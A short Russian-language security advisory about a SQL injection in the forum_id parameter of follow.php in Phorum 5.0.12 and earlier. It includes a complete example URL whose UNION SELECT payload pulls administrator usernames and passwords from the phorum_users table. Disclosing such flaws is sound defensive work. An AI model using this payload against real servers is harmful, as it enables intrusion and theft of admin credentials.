Программа: Phorum 5.0.12 и более ранние версии
Удаленный атакующий может выполнить произвольный SQL команды на уязвимом сервере.
Уязвимость существует из-за некорректной фильтрации данных в параметре forum_id файла 'follow.php'. Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный SQL код на целевом сервере.
Пример:
http://[target]/phorum5012/follow.php?forum_id=1 &,f00=bar,1=-99%20UNION%20ALL%20SELECT
%201%2c1%2c1%2c1%2c1%2cCONCAT (username%2c%27|%27%2cpassword)%2c1%2c1
%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c 1%2c1%2c1%2c1%20FROM%20phorum_users%
20WHERE%20admin=1